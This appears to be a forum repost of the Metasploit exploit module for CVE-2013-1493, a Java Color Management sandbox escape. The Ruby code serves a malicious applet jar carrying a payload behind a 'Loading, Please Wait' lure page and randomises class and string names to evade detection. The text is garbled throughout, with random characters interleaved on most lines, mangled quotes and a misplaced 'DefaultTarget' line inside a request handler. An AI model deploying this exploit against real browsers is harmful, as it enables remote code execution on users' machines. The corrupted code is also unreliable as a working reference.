##3 I o! ^. v/ I# P+ j
4 @# g w+ q0 @% _# This file is part of the Metasploit Framework and may be subject to. L' m& J) O6 a
# redistribution and commercial restrictions. Please see the Metasploit
: ]3 e- e/ ~: L# web site for more information on licensing and terms of use.2 c, S. h! w3 C5 I3 b/ v
# http://metasploit.com/2 L( E1 [+ `: P2 n! W1 H
### g1 q4 D1 [' W2 |# [( X) [
require ‘msf/core’
, {- p3 a' q9 Grequire ‘rex’$ u7 } r- E3 w
class Metasploit3 < Msf::Exploit::Remote$ V1 c. ?3 y! ]: [" V6 ~
Rank = NormalRanking! j5 C/ F* w# }( J$ Y
include Msf::Exploit::Remote::HttpServer::HTML1 Z) ?4 m! K% r! a* N8 t- i
include Msf::Exploit::EXE, _9 W' K% |; i& Y" ]! Q$ c" A
include Msf::Exploit::Remote::BrowserAutopwn
0 A/ z6 J3 M7 a# oautopwn_info({ :javascript => false })0 g6 R: x$ p2 B. E, j
def initialize( info = {} )
4 y- p/ |, p3 ~super( update_info( info,% `! q5 N1 N. v" U
‘Name’ => ‘Java CMM Remote Code Execution’,
( k* {5 J1 F1 }‘Description’ => %q{4 Z" n/ t5 F6 M: `5 U0 F
This module abuses the Color Management classes from a Java Applet to run, |4 a8 L; U, n0 l
arbitrary Java code outside of the sandbox as exploited in the wild in February
: g6 I1 K( H9 V4 t( zand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
2 h1 w$ Z: i' a. O. mand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP14 f( @& {4 n* g1 k6 k# [( D) l7 R
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
) w; z2 K, }; ^warning in order to run the malicious applet.3 }- ~( e. [& B7 ]( {! Q/ {+ K
},
, ]4 F) i3 [* E‘License’ => MSF_LICENSE,% B8 Q+ U: O& d
‘Author’ =># o0 `. v# b7 }* d( n! R
'Unknown', # Vulnerability discovery and Exploit! p6 j( W# o& l' S. X, V
'juan vazquez' # Metasploit module (just ported the published exploit)
- u2 Y e2 |5 W- f# {. \],9 w0 x+ k2 j8 f$ x1 A
‘References’ =>7 ^% w. q0 M! `1 z" s
[3 ?* o# w4 V# D
[ 'CVE', '2013-1493' ],4 {7 h- w0 ~6 t
[ 'OSVDB', '90737' ],$ U3 p, a. x& V8 ]) [
[ 'BID', '58238' ],7 D7 S7 N5 A, s8 z `* ^$ G
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],8 R$ S, D9 ^1 b/ v3 h! ?" \
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],; T2 O3 }4 V8 S% c8 y; b9 h: @1 V
[ 'URL', 'http://pastie.org/pastes/6581034' ]9 c% Y; ]5 n4 v' P& L! S* R
],$ d" o3 H1 U7 _5 G! Z
‘Platform’ => [ 'win', 'java' ],
' F. q8 B* x2 x* _‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
) H* J+ P0 N; u3 I% y! {0 F( r‘Targets’ =>' Z( R5 }: ~$ }/ L
[
8 h/ C3 Z- Y L' L7 J$ e9 l5 N( p9 _[ 'Generic (Java Payload)',
6 ]- C% f2 G* @- e: i O0 Q{" u. L# G+ R k+ _
'Platform' => 'java',
" F* a7 c5 g7 V1 q/ U+ _2 d'Arch' => ARCH_JAVA
: i* s- U0 J9 Q8 f9 G; z}
' c6 ]# t# r7 J8 ^6 a5 `3 W],
( x+ B) m& p/ z/ o[ 'Windows x86 (Native Payload)',: K+ H3 T; e B6 Z7 g6 I) {
{& _$ s C# B0 B8 n2 K+ I
'Platform' => 'win',
) c! Y& C" z, U/ n. a0 D0 v'Arch' => ARCH_X86
( W1 Q- E! F8 G2 q( u}9 I9 x/ t' h/ _
]$ a0 R5 g& g/ v9 u: F$ L
],8 U9 a& K8 G6 f. t+ y, y
‘‘DisclosureDate’ => ‘Mar 01 2013′
h: l$ W4 [8 } \2 p# H, o)) [7 D# k9 j5 P7 A* T
end4 E& [6 {' I( N* M. P" K8 c( o
def setup' ^+ S- Y$ t4 U% M3 U+ C
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)/ ~) H E6 d6 A k5 j9 \; _
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
& r; m5 w0 n% A8 H# f( a( w; a: p/ Npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
8 k1 X0 L* j& u+ c! C@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 i$ {6 {* r% B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
! X4 n8 W. f4 B0 |@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }9 ?+ \4 z* t0 H. w
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)! v: X* k; I0 O5 t7 ^4 C
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }* p. b$ ]+ p1 w' \: `: f
@init_class_name = rand_text_alpha(“Init”.length)9 w3 C3 n3 J! ~
@init_class.gsub!(“Init”, @init_class_name)
) o& \" X0 y" u* B! j: Lsuper0 J) n( M+ @7 d
end
. I6 K8 t) k! N% @) ]2 Edef on_request_uri(cli, request)
* d u- @" e5 e* @7 S+ ^print_status(“handling request for #{request.uri}”)
, B" c, U' ^: N" vcase request.uri1 x* k* M" f1 g( J& ?
when /\.jar$/i
8 k, v1 L# p2 u+ {9 Cjar = payload.encoded_jar4 L4 \9 L8 j' p' Y
jar.add_file(“#{@init_class_name}.class”, @init_class), T7 B! A4 a( w. T4 q+ G- }
jar.add_file(“Leak.class”, @leak_class)
6 _7 d# B# l2 s6 p+ Bjar.add_file(“MyBufferedImage.class”, @buffered_image_class)! O6 X. i2 @! C4 R+ \5 U C
jar.add_file(“MyColorSpace.class”, @color_space_class) k c( y& ^8 M! k7 t+ o- h$ K1 h
DefaultTarget’ => 1,
3 N9 `; j: w7 V: [metasploit_str = rand_text_alpha(“metasploit”.length) H, Y' w1 x, \/ d: b
payload_str = rand_text_alpha(“payload”.length)1 w0 g4 a9 }, g2 p5 v& F( F4 e
jar.entries.each { |entry|$ o" J) e) i4 H/ J+ ]; j' l5 h2 E
entry.name.gsub!(“metasploit”, metasploit_str)
9 u6 w& D) {. S. a z, v4 uentry.name.gsub!(“Payload”, payload_str)
* |0 J& t% d; X: m/ Yentry.data = entry.data.gsub(“metasploit”, metasploit_str)
7 S0 i1 S: s/ H. uentry.data = entry.data.gsub(“Payload”, payload_str)
- ?: q: |, @: A+ _+ w1 l+ Z! ?}4 T% z7 r8 ~$ s' x
jar.build_manifest
t; ^) k3 _/ J1 o b/ ]& O9 A( qsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })& f4 o4 g; X8 t+ T8 F2 g: K
when /\/$/
) \8 a" S- \/ l5 T* @' ipayload = regenerate_payload(cli)) e! Y" ~1 \9 }3 F
if not payload% p8 Q6 K! @1 U6 _0 f
print_error(“Failed to generate the payload.”)
& A5 I+ @. H! N4 ]send_not_found(cli)
8 E$ c C9 ?- M; Qreturn1 i# M' i' ~+ v8 V4 [0 {
end3 A8 k$ H% E C3 ]
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })# ^+ G# Y2 i6 M, \0 V6 ?
else
( G( D5 h5 x2 B5 ]- Osend_redirect(cli, get_resource() + ‘/’, ”)# t' w$ `! o+ C. \5 u7 J
end8 W% J, O @# r( U! K, M. O
end) l, M; l+ ~ P, D& T- c! p
def generate_html
: O; X3 N" ~1 ~' ?: M1 b1 G& bhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|+ x, C/ o9 [% j' K" Z, h
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
+ h B- }: D+ p& mhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
: ^% K8 ^6 [+ B) }7 U! _% ]. fhtml += %Q|</applet></body></html>|
4 }" m, D. K* C: l0 M1 breturn html2 E! U8 @, X# B5 z# {0 {% o; l
end" J9 ~) `2 t o6 M& D
end) [, j2 `; A! Q: T
end; l: _0 _. l5 a* y2 B% G& v& D
|
发表于 2013-4-4 17:31:17
收藏
支持
反对